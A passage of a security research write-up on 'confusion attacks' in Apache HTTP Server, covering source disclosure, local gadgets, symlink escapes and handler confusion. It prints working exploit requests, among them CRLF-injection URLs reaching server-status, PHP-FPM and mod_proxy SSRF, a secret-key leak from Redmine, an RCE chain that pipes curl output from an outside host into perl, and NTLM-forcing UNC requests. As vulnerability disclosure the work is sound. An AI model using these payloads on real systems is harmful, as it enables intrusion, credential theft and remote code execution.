 # # the source code of download.cgi

✔️ 2-1-2. Disclose PHP Source Code

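Next is leaking server-side PHP source code. PHP has many deployment scenarios. If the PHP environment is applied only to specific directories or virtual hosts (common in web hosting), the PHP files can be accessed through a virtual host that does not have PHP enabled, leaking their source code!

For example, www.local and static.local are two virtual hosts on the same server. www.local is allowed to run PHP while static.local only serves static files, so the sensitive information inside config.php can be leaked as follows:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php
$ curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
 # the source code of config.php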


⚔️ Primitive 2-2. Local Gadgets Manipulation!

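Next is our second primitive: Local Gadgets Manipulation.

When we talked about "browsing any file on the operating system", you may have wondered: "Wait, so a single unsafe RewriteRule can reach /etc/passwd?" Yes, but also not quite. Huh?

Technically, the server does check whether /etc/passwd exists, but Apache HTTP Server's built-in access control blocks our access. Here is the content of Apache HTTP Server's configuration template:

<Directory />
    AllowOverride None
    Require all denied
</Directory>

You can see that access to the root directory / is blocked by default (Require all denied). So is that game over? Digging further into the various Httpd distributions reveals that Debian/Ubuntu allows /usr/share by default:

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

So our "arbitrary file access" turns out to be not so arbitrary. Still, breaking the assumption that only the DocumentRoot can be browsed is a big step forward. What remains is to "squeeze" every possibility out of this directory. Every available resource, the tutorials and examples already in the directory, documentation, unit test files, and even programming languages on the server such as PHP and Python, or PHP modules, can all become targets for abuse!

P.S. Of course, the explanation above is based on the Httpd configuration shipped with Ubuntu/Debian. In practice, we have also found applications that remove the Require all denied line from the root directory, which allows direct access to /etc/passwd.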

✔️ 2-2-1. Local Gadget to Information Disclosure

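Let's look for files in this directory that can be exploited. First, if the target Apache HTTP Server has the websocketd service installed, the package places an example PHP script, dump-env.php, under /usr/share/doc/websocketd/examples/php/ by default. If the target server has a PHP environment, this example can be accessed directly to leak sensitive environment variables.

In addition, if the target also has Nginx or Jetty installed, then although /usr/share is in theory a read-only copy placed there at package installation, the default Web Root of these services sits under /usr/share. This technique can therefore leak sensitive information from those web applications as well, such as the web.xml settings on Jetty: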

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

Here is a simple demonstration that leaks the output of phpinfo() by accessing the read-only copy of setup.php that ships with the Davical package.

✔️ 2-2-2. Local Gadget to XSS

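How can this technique be turned into XSS? The Ubuntu Desktop environment installs LibreOffice, an open-source office suite, by default. The language-switching feature in its help files can be used to achieve XSS.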

Path: /usr/share/libreoffice/help/help.html

    var url = window.location.href;
    var n = url.indexOf('?');
    if (n != -1) {
        // the URL came from LibreOffice help (F1)
        var version = getParameterByName("Version", url);
        var query = url.substr(n + 1, url.length);
        var newURL = version + '/index.html?' + query;
        window.location.replace(newURL);
    } else {
        window.location.replace('latest/index.html');
    }

So even if the target has not deployed any web application, an unsafe RewriteRule lets us create XSS from files that ship with the operating system.

✔️ 2-2-3. Local Gadget to LFI

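What about arbitrary file read? If the target server has PHP or front-end packages installed, such as JpGraph, jQuery-jFeed, or even WordPress or Moodle plugins, the tutorials or debugging code they ship with can become gadgets, for example: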

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Here we demonstrate using the proxy.php that ships with jQuery-jFeed to read /etc/passwd.

✔️ 2-2-4. Local Gadget to SSRF

Finding an SSRF is no problem either. For example, MagpieRSS provides a magpie_debug.php file that makes a perfect gadget:

  • /usr/share/php/magpierss/scripts/magpie_debug.php
✔️ 2-2-5. Local Gadget to RCE

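So, can we get RCE? Not so fast, let's take it step by step! First, this technique lets us re-apply every existing attack surface. For example, an old version of PHPUnit accidentally left behind during development (or even depended on by a third-party package) can be exploited directly with CVE-2017-9841 to execute arbitrary code. Another example is a freshly installed phpLiteAdmin (since it is a read-only copy, the default password is admin). By now you can probably see the endless potential of Local Gadgets Manipulation. What remains is to discover more powerful and more universal gadgets!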


⚔️ Primitive 2-3. Jailbreak from Local Gadgets

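At this point you may be wondering: "Is it really impossible to break out of /usr/share?" Of course it is possible, and that is the third primitive: jailbreaking from /usr/share!

The Debian/Ubuntu distributions of Httpd enable the FollowSymLinks option by default, and even on other distributions Apache HTTP Server implicitly allows symbolic links by default.

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>

✔️ 2-3-1. Jailbreak from Local Gadgets

So whenever a package has a symbolic link in its installation directory that points outside /usr/share, that link becomes a springboard to more gadgets and more exploitation. Here are some exploitable symbolic links we have found so far: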

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

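To close out the jailbreak primitive, let's demonstrate an RCE that hops through two levels of symbolic links in Redmine. In a default Redmine installation, the code directory contains an instances/ directory that points to /var/lib/redmine/, and the default/config/ directory under /var/lib/redmine/ in turn points to the /etc/redmine/default/ folder, which stores Redmine's database configuration and application secret key.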

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/default/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

So with an unsafe RewriteRule and two levels of symbolic links, we can easily access the application secret key used by Redmine:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405
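
The two-level hop can be reproduced safely in a scratch directory. The Python sketch below rebuilds a directory layout shaped like the Redmine one described above inside a temporary folder and shows where the requested path finally resolves. It is purely illustrative: `build_demo_tree` is a hypothetical helper, the key content is a dummy value, and it assumes a platform where unprivileged symbolic links are available.

```python
import os
import tempfile


def build_demo_tree(root):
    """Create a miniature copy of the symlink layout and return the requested path."""
    share = os.path.join(root, "usr/share/redmine")
    var = os.path.join(root, "var/lib/redmine/default")
    etc = os.path.join(root, "etc/redmine/default")
    for directory in (share, var, etc):
        os.makedirs(directory)
    with open(os.path.join(etc, "secret_key.txt"), "w") as handle:
        handle.write("not-a-real-key\n")
    # First hop: instances/ -> var/lib/redmine/
    os.symlink(os.path.join(root, "var/lib/redmine"), os.path.join(share, "instances"))
    # Second hop: default/config/ -> etc/redmine/default/
    os.symlink(etc, os.path.join(var, "config"))
    return os.path.join(share, "instances/default/config/secret_key.txt")


with tempfile.TemporaryDirectory() as root:
    requested = build_demo_tree(root)
    resolved = os.path.realpath(requested)
    print(os.path.relpath(resolved, os.path.realpath(root)))
```

The printed path is relative to the scratch root, so it shows the destination of the hops without depending on where the temporary directory lives.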

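Redmine is built on Ruby on Rails, and the content of secret_key.txt is exactly the key used for signing and encryption. The rest should be familiar to anyone who has attacked RoR: use the known key to sign and encrypt a malicious Marshal object, embed it in a Cookie, and achieve remote code execution through server-side deserialization!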


🔥 3. Handler Confusion

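The last attack to introduce is the Confusion on Handler. This attack also exploits a piece of technical debt left over from Apache HTTP Server's ancient architecture. Let's use an example to understand it quickly: if you want to run the classic mod_php on Httpd, which of the following two directives do you think is correct?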

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

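The answer is: both get PHP running correctly! Below are the syntax formats of the two directives. Not only are their usage and parameters similar, their effects are now exactly the same. So why did Apache HTTP Server design two different directives in the first place?

AddHandler handler-name extension [extension] ...
AddType media-type extension [extension] ...

In fact, handler-name and media-type stand for different fields in Httpd's internal structure, corresponding to r->handler and r->content_type respectively. Users can use them interchangeably without noticing thanks to a piece of code that has been in Apache HTTP Server since its early development in 1996: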

Path: server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r)
{
    // [...]
    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p = ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2 = '\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

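As you can see, before entering the main module handler ap_run_handler(), if r->handler is empty, the content of the r->content_type field is used as the module handler. This is the main reason AddType and AddHandler have the same effect: the media-type is converted into the handler-name just before execution. Our third attack, Handler Confusion, is built around this behaviour.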
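
The fallback is small enough to restate in Python. This is a sketch of the logic shown above rather than Apache's implementation: `effective_handler` is a hypothetical helper, and `DEFAULT_HANDLER` is a placeholder string standing in for `AP_DEFAULT_HANDLER_NAME`, whose real value is not assumed here.

```python
DEFAULT_HANDLER = "<default>"   # placeholder for AP_DEFAULT_HANDLER_NAME (assumption)


def effective_handler(handler, content_type):
    """Return the handler name that would be run for a request."""
    if handler:
        return handler                      # an explicit handler always wins
    if not content_type:
        return DEFAULT_HANDLER
    # Drop media type parameters such as "; charset=..." and trailing spaces.
    return content_type.split(";", 1)[0].rstrip(" ")


print(effective_handler(None, "application/x-httpd-php"))
print(effective_handler(None, "text/html; charset=iso-8859-1"))
print(effective_handler("server-status", "text/html"))
```

The first call shows why `AddType` alone is enough to run PHP: with no handler set, the media type becomes the handler name.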


⚔️ Primitive 3-1. Overwrite the Handler

With this conversion in mind, the first primitive is Overwrite the Handler. Imagine the target Apache HTTP Server runs PHP through AddType:

AddType application/x-httpd-php  .php

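In the normal flow, when you visit http://server/config.php, mod_mime first copies the content type that AddType maps to the file extension into r->content_type during the type_checker phase. Since r->handler is never assigned during the whole HTTP lifecycle, ap_invoke_handler() treats r->content_type as the handler before executing it, and mod_php ends up handling the request.

But what happens if some module "accidentally" overwrites r->content_type before ap_invoke_handler() is reached?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

The first exploitation of this primitive is to leak arbitrary PHP source code through that "accident". The technique was first mentioned by Max Dmitriev in his research presented at ZeroNights 2021 (kudos to him!). The talk and slides can be found here: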

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

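Max Dmitriev observed that sending an invalid Content-Length makes the remote Httpd server hit an unexplained error and return the PHP source code along with it. Tracing the flow in depth, he found the cause to be a double response that occurs because ModSecurity does not properly handle the AP_FILTER_ERROR return value when using the APR (Apache Portable Runtime) library. When the error occurs, Httpd wants to send an HTML error message, so r->content_type is overwritten with text/html along the way.

Because ModSecurity does not handle the return value properly, the internal Httpd flow that should have stopped keeps running, and this "side effect" overwrites the Content-Type that was originally set. As a result, a file that should be processed as PHP is handled as a plain document, and its code and sensitive settings are printed out. 🤫

$ curl -v http://127.0.0.1/info.php -H "Content-Length: x"
> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Content-Type: text/html; charset=iso-8859-1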

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title>
...
<?php phpinfo();?>

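In theory, every configuration based on Content-Type is vulnerable to this kind of problem. So in addition to the php-cgi with mod_actions setup shown in Max's slides, plain mod_php with AddType is affected too.

It is also worth mentioning that this side effect was corrected in Apache HTTP Server 2.4.44 as a bug fix that improved the request parser, so the "vulnerability" was considered fixed until I picked it up again. But since the root cause is still that ModSecurity does not handle errors properly, the same behaviour can be reproduced as long as another path that triggers AP_FILTER_ERROR is found.

P.S. This issue was reported to ModSecurity through the official email on 6/20, and the Project Co-Leader suggested returning to the original GitHub Issue for discussion.

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

Based on the double response behaviour and its side effect, this primitive can lead to other, cooler exploitation. However, since the issue has not been fully fixed, further exploitation will be disclosed after the fix.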


⚔️ Primitive 3-2. Invoke Arbitrary Handlers

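Think carefully about the Overwrite Handler primitive. Although it happens because ModSecurity does not handle errors properly, which leaves the request with the wrong Content-Type, the deeper root cause is that Apache HTTP Server has no way to tell the semantics of r->content_type when it uses it. The field can be a value set by a directive during the request phase, or it can be the content of the Content-Type header in the server response.

So in theory, if you can control the Content-Type header in the server response, you can invoke any module handler through that legacy code. This is the last primitive of Handler Confusion: invoking arbitrary internal module handlers of Apache HTTP Server!

There is one last piece of the puzzle, though. In Httpd, every place where r->content_type can be modified from the server response is located after that legacy code. Even if the field is modified, the HTTP lifecycle is already at its end by then, and no further exploitation is possible... or is it?

We brought in RFC 3875 as our relief pitcher! RFC 3875 is the specification for CGI, and Section 6.2.2 defines a Local Redirect Response behaviour: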

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

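In short, the specification requires CGI to use server-side resources to handle the redirect under certain conditions. Looking closely at mod_cgi's implementation of this part of the specification, you will find: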

Path: modules/generators/mod_cgi.c#L983

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,     // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {        // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                   // <------ [3]
        return OK;
    }

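First, mod_cgi executes[1] the CGI and scans its output to set the corresponding Status and Content-Type. If[2] the returned Status is 200 and the Location header starts with /, the response is treated as a server-side redirect and processed[3]. Looking closely at the implementation of ap_internal_redirect_handler(), you will find: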

Path: modules/http/http_request.c#L800

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

Httpd first creates[1] a new request structure and copies[2] the current r->content_type into it. After processing[3] the lifecycle, it calls[4] ap_invoke_handler(), the place containing the legacy conversion mentioned earlier. So in a server-side redirect, if you can control the response headers, you can invoke any module handler within Httpd. Basically every CGI implementation in Apache HTTP Server follows this behaviour. Here is a simple list:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi
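
Putting the two C snippets together, the local redirect path can be sketched in Python as follows. This is a simplified model under stated assumptions, not Apache's code: `local_redirect` is a hypothetical helper, requests are plain dictionaries, and it assumes that no handler or content type is configured for the redirect target, so the content type carried over from the CGI response is the one promoted to handler.

```python
def local_redirect(status, headers_out, current_handler, content_type):
    """Return the follow-up request created for a CGI local redirect, or None."""
    location = headers_out.get("Location")
    if not (location and location.startswith("/") and status == 200):
        return None                               # not a local redirect
    new_request = {"uri": location, "method": "GET",
                   "handler": None, "content_type": None}
    if current_handler:                           # the CGI handler is set at this point
        new_request["content_type"] = content_type
    # Legacy fallback: with no handler on the new request, the carried-over
    # content type is used as the handler name.
    new_request["handler"] = new_request["handler"] or new_request["content_type"]
    return new_request


print(local_redirect(200, {"Location": "/ooo"}, "cgi-script", "server-status"))
print(local_redirect(200, {"Location": "http://example.com/"}, "cgi-script", "text/html"))
```

Only the first call produces a new internal request, and its handler is whatever the CGI response declared as its content type.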

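How can this server-side redirect be triggered in a real scenario? Since you need to control at least the Content-Type and part of the Location in the HTTP response, here are two scenarios for reference:

  1. A CRLF Injection in the CGI response headers, overwriting existing HTTP headers through new lines
  2. An SSRF that gives full control over the response headers, such as the django-revproxy project hosted on mod_wsgi

The following examples are all based on this insecure CRLF Injection:

#!/usr/bin/perl

use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";
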
✔️ 3-2-1. Arbitrary Handler to Information Disclosure

First, going from an arbitrary handler to information disclosure. Here we use Httpd's built-in server-status handler, which is usually only accessible from localhost:

<Location /server-status>
SetHandler server-status
    Require local
</Location>

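With the ability to invoke arbitrary handlers, we can overwrite the Content-Type to access sensitive information that would otherwise be out of reach: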

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
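
A request like the one above can be assembled programmatically. The following Python sketch builds the encoded URL and then mimics what the vulnerable Perl script would print, assuming (as a simplification) that the server reads headers up to the first blank line and that a later header replaces an earlier one with the same name. `build_url` and `cgi_headers` are hypothetical helpers, and `http://server` is the placeholder host used throughout this article.

```python
import re
from urllib.parse import quote, unquote


def build_url(location, content_type):
    """Encode the injected headers into the `r` parameter of redir.cgi."""
    injected = ("http://\r\n"
                "Location:" + location + "\r\n"
                "Content-Type:" + content_type + "\r\n"
                "\r\n")
    return "http://server/cgi-bin/redir.cgi?r=" + quote(injected, safe="")


def cgi_headers(raw_value):
    """Simulate the Perl script's output and parse the resulting header block."""
    redir = unquote(raw_value)
    output = ""
    if re.match(r"https?://", redir):             # same check as m{^https?://}
        output += "Location: " + redir + "\n"
    output += "Content-Type: text/html\n\n"
    headers = {}
    for line in output.splitlines():
        if line == "":                            # first blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()     # assumption: last header wins
    return headers


url = build_url("/ooo", "server-status")
print(url)
print(cgi_headers(url.split("?r=", 1)[1]))
```

In this model the injected `Location` and `Content-Type` lines take effect, while the script's own `Content-Type: text/html` ends up after the blank line, in the body.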

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

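An image can also easily be turned into a PHP backdoor. For example, after a user uploads a file with a legitimate extension, this primitive can direct mod_php to execute the malicious code embedded in the file: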

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Full SSRF

Invoking mod_proxy to access any protocol on any URL is of course no problem either:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3f %0d%0a
%0d%0a

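This is also an SSRF that gives full control over the HTTP request and returns the entire HTTP response! A slight pity is that when accessing Cloud Metadata, mod_proxy automatically adds an X-Forwarded-For header, which gets the request blocked by the Metadata protection mechanisms of EC2 and GCP. Otherwise this would be an even more powerful primitive.

✔️ 3-2-3. Arbitrary Handler to Access Local Unix Domain Socket

However, mod_proxy offers an even more "convenient" feature: it can access local Unix Domain Sockets! 😉

Here we demonstrate accessing PHP-FPM's local Unix Domain Socket to execute a PHP backdoor located in /tmp/: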

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

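In theory this technique has even more potential, such as protocol smuggling (smuggling FastCGI inside HTTP/HTTPS 😏) or other vulnerable Local Sockets. These are left to those who are interested.

✔️ 3-2-4. Arbitrary Handler to RCE

Finally, let's demonstrate how to turn this primitive into RCE with a common CTF trick! The official PHP Docker image includes PEAR, a command-line PHP package manager, and using its Pearcmd.php as an entry point enables further exploitation. For the detailed history and principles, see the Docker PHP LFI summary written by Phith0n.

Here we use a Command Injection inside run-tests to complete the whole exploit chain. The details are as follows: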

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

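It is common to see CRLF Injection or Header Injection reported as XSS in Security Advisories and Bug Bounties. While these can indeed sometimes chain into impressive vulnerabilities such as Account Takeover through SSO, don't forget that they can also lead to Server-Side RCE. This demonstration proves it!


🔥 4. Other Vulnerabilities

The Confusion Attacks series basically ends here. However, a few other vulnerabilities found while researching Apache HTTP Server are worth mentioning, so they are covered separately.


⚔️ CVE-2024-38472 - Windows UNC-based SSRF

First, the Windows implementation of the apr_filepath_merge() function allows UNC paths. Below are two different trigger paths that let an attacker force NTLM authentication to an arbitrary host:

✔️ Triggered via HTTP Request Parser

Triggering this directly through an HTTP request requires an additional Httpd setting. Although the setting may look unrealistic at first glance, it seems to appear often together with Tomcat (mod_jk, mod_proxy_ajp) or with PATH_INFO:

AllowEncodedSlashes On

In addition, since Httpd rewrote its core HTTP request parser logic after 2.4.49, triggering the vulnerability on later versions requires one more setting:

AllowEncodedSlashes On
MergeSlashes Off

Two %5C can force Httpd to perform NTLM authentication to attacker-server. In practice this SSRF can also be turned into RCE through NTLM Relay!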

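$ curl http://server/%5C%5Cattacker-server/path/to

✔️ Triggered via Type-Map

The Debian/Ubuntu distributions of Httpd enable Type-Map by default:

AddHandler type-map var

By uploading a .var file to the server with its URI field set to a UNC path, you can also force the server to perform NTLM authentication to the attacker. This is also the second .var trick I have proposed 😉


⚔️ CVE-2024-39573 - SSRF via Full Control of the RewriteRule Prefix

Finally, when the prefix of a RewriteRule in the Server Config or VirtualHost is fully controllable, the Proxy and its related sub-modules can be invoked:

RewriteRule ^/broken(.*) $1

The following URL hands the request over to mod_proxy:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to

But if the administrator tests properly, they will find that such a rule is impractical. So I originally reported it only as a companion to another vulnerability, and did not expect this behaviour to be fixed as a security boundary as well. After the patch came out, other researchers applied the same behaviour to Windows UNC and obtained another CVE.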


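Future Works

Finally, some outlook on the future of this research and where it could be strengthened. Confusion Attacks remain a very promising attack surface, especially since this research focused on only two fields. Unless Apache HTTP Server makes structural improvements from the ground up or gives developers a good development standard, I believe more "confusions" will appear in the future!

So which areas could be strengthened? Different Httpd distributions ship different configurations, so other Unix-like systems such as the RHEL family and the BSDs, and even software bundles that use Httpd, may have more escapable RewriteRules, more powerful Local Gadgets, and even unexpected symbolic link hops. These are left to those who are interested.

Finally, due to time constraints, I could not share more real cases found and exploited on actual websites, devices, and even open-source projects. But you can probably imagine that the real world still hides countless unexplored rules, bypassable authentication, and CGIs lurking beneath the surface. As for how to apply the techniques from this article around the world? That is your mission now!


Conclusion

Maintaining an open-source project is truly difficult, especially when trying to stay convenient for users while keeping compatibility with older versions. The slightest slip can lead to a full compromise (for example, in Httpd 2.4.49 a small change in path-handling logic led to the disastrous CVE-2021-41773). The whole development process has to step carefully over piles of legacy code and technical debt. So if any Apache HTTP Server developers are reading this, I would like to say: thank you for your contributions!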
